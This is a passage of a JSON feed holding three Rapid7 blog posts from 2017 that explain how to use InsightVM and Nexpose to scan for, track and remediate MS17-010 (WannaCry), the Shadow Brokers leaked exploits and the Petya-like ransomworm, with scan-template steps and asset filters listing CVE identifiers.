src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in “vulnerability.vulnKey = “MS17-010”:</span></p><p><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66962/pastedImage_29.png\"><img class=\"image-12 jive-image\" height=\"539\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66962/758-539/pastedImage_29.png\" style=\" width: 833.213px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don’t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:2ca40ae4-bf1e-4d07-bca8-48bcdefcec45] -->", "cvss3": {}, "published": "2017-05-15T18:25:42", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-15T18:25:42", "id": "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/15/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-25T17:57:11", "description": "<!-- [DocumentBodyStart:f67c4b5d-4e9f-4a32-a187-cc604c412a04] --><div class=\"jive-rendered-content\"><p><a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"30294\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/pdxbek\">Rebekah Brown</a> and the Rapid7 team have delivered a spot-on breakdown of the recent Shadow Brokers exploit and tool release. Before you read any further, if you haven’t done so already, please <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7842\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq\">read her post</a>. It’s probably not the only post you’ve read on this topic, but it is cogent, well-constructed and worth the 5 minutes.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Back with me? With all of the media attention and discussion in the infosec community, it would not surprise me to hear that a security team still wondered aloud: “Nation-state intrigue makes for scintillating reading, but what do I do with this news?”</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>So long as there are attackers and defenders in infosec, the Rapid7 community continues to be on the front lines of the struggle. But, in such a position, which action is prudent? Purchasing an underground bunker outright may not be a sound decision for you.  However, there are practical actions you can take.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Don't waste a learning moment</h2><p>You invest in building and maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsolutions%2Fvulnerability-management%2F\" target=\"_blank\">vulnerability management program</a>. This includes making sure you have visibility to the latest threats and perhaps <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7752\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2016/12/19/giving-the-gift-of-time-nexpose-adaptive-security-improvements\">automating your response</a>. The exploits thrust onto the world stage by the Shadow Brokers, while newsworthy, distill down to a seemingly normal set of patches and updates. As Rebekah's post states:</p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-family: arial, helvetica, sans-serif;\"><span style=\"font-size: 12pt; color: #000000;\">I</span><span style=\"font-size: 12pt; color: #000000;\">f you are unsure if you are up to date on these patches, we have checks for all of them in</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 Nexpose</span></a><span style=\"font-size: 12pt; color: #000000;\"> and</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 InsightVM</span></a><span style=\"font-size: 12pt; color: #000000;\">. These checks are all included in the </span><span style=\"font-size: 12pt; color: #000000;\">Microsoft Hotfix</span><span style=\"font-size: 12pt; color: #000000;\"> scan template.</span><span style=\"font-size: 12pt; color: #000000;\"> </span></span></p></blockquote><p>It turns out, if you’re maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Ffundamentals%2Fvulnerability-management-and-scanning%2F\" target=\"_blank\">vulnerability scans</a>, and getting the visibility to your Windows assets, you already have the visibility you need. But that doesn’t mean you have to treat this event as business as usual.  Perhaps you’d like to see how your security program fares when up against vaunted Shadow Brokers trove?</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Here are a few ideas you can try based on a mix of newer and long-standing capabilities.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Look for what you need</h2><p>If you want to efficiently identify the presence of Shadow Brokers’ leaked vulnerabilities, and you don’t want to change your existing Scan regime, create a new Scan template.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>You’ll find creating a new <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FWorking_with_scan_templates_and_tuning_scan_performance.html\" rel=\"nofollow\" target=\"_blank\">Scan Template</a> in the Administration tab. Start off by naming your template:</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\"><img class=\"jive-image\" height=\"217\" src=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\" style=\"border-style: none;\" width=\"402\"/></a></span></span></p><p>Next, configure your Scan Template for specific vulnerability checks. Tailor your template by looking only for the checks associated with the CVEs exploited by the Shadow Brokers leak.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0143</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0144</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0145</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0146</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0147</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0148</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS10-061</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS14-068</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS09-050</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS08-067</span></p></td></tr></tbody></table></div><h4></h4><p>Use the CVEs to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FSelecting_vulnerability_checks.html\" rel=\"nofollow\" target=\"_blank\">search for the checks and add to your template</a>. Here, I’ve added CVE-2017-0144.</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\"><img class=\"jive-image\" height=\"111\" src=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\" style=\"border-style: none;\" width=\"446\"/></a></span></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Now that you’ve got one template squared away, you can take your new Scan Template out for a spin on an entire Site, or an ad hoc scan, or you might want to check out <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7778\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/01/25/scan-configuration-improvements-in-nexpose\">improvements to Scan Configuration</a> to target a scan for just the subset of a Site.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>If you don’t have time for manual scans, create an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7261\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2015/10/08/nexpose-60-new-feature-adaptive-security\">Automated Action</a> to scan an asset when it is discovered on your network. Whether you’ve discovered the asset via DHCP discovery connection or just by a regular discovery scan, you can use Automated Actions to scan the Asset when it appears.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Give your stakeholders a view</h2><p>I couldn’t leave you without one final tried and true tip for satisfying demanding executive stakeholders: You can always create a new dashboard!</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>I’ve created a custom Shadow Brokers Leak dashboard to house all the cards and analysis I’ll need.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\"><img class=\"jive-image\" height=\"308\" src=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\" style=\"border-style: none;\" width=\"324\"/></a></span></p><p>Next, I’ll start adding Cards that I’d like to work with. Let’s use the Newly Discovered Assets card as a starting point. I’ve added this card to my Dashboard and I’ll click Expand Card to drill in.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\"><img class=\"jive-image\" height=\"266\" src=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\" style=\"border-style: none;\" width=\"197\"/></a></span></p><p>Next, I’ll create a new filter to look only for Assets that are affected by CVE and hotfixes identified above. I’ll paste this into the Filter field:</p><p><strong>*UPDATE: Corrected May 24,2017: Changed \"ms10-068\" to \"ms14-068\"*</strong></p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\" OR asset.vulnerability.title CONTAINS \"ms10-061\" OR asset.vulnerability.title CONTAINS \"ms14-068\" OR asset.vulnerability.title CONTAINS \"ms09-050\" OR asset.vulnerability.title CONTAINS \"ms08-067\" OR asset.vulnerability.title CONTAINS \"ms17-010\"</span></p></blockquote><p>It’ll look something like this:</p><p><span style=\"font-size: 11pt; font-family: Calibri; color: #212121;\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\"><img class=\"jive-image\" height=\"132\" src=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\" style=\"border-style: none;\" width=\"624\"/></a></span> </span></p><p>I’ve saved this filter so I can use it across any number of cards I wish. Since I’ve done the work of creating the filter once, it is straightforward to add cards, apply the filter, and then save the Cards to my dashboard. I’ve built a tailored view, showing the impact of the Shadow Brokers leaked exploits on my organization.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\"><img class=\"jive-image\" height=\"379\" src=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>If you’re feeling comfortable with this approach, take a step futher! Try out an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7838\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/04/24/actionable-remediation-projects\">Actionable Remediation Project</a> from here and get started taking down these risks on your turf.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Not a customer of ours? <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">Try a free 30-day trial of InsightVM here</a>.</p><h4></h4></div><!-- [DocumentBodyEnd:f67c4b5d-4e9f-4a32-a187-cc604c412a04] -->", "cvss3": {}, "published": "2017-05-24T23:14:26", "title": "Vulnerability Management Tips for the Shadow Brokers Leaked Exploits", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-24T23:14:26", "id": "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-03T17:21:32", "description": "<!-- [DocumentBodyStart:880a7067-953c-4d86-bb9f-22e02d26586e] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. It is believed that the ransomworm achieved its initial infection via a compromised software update, and that it then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7’s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.  Under the Administration tab, go to Templates > Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check “</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">” and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 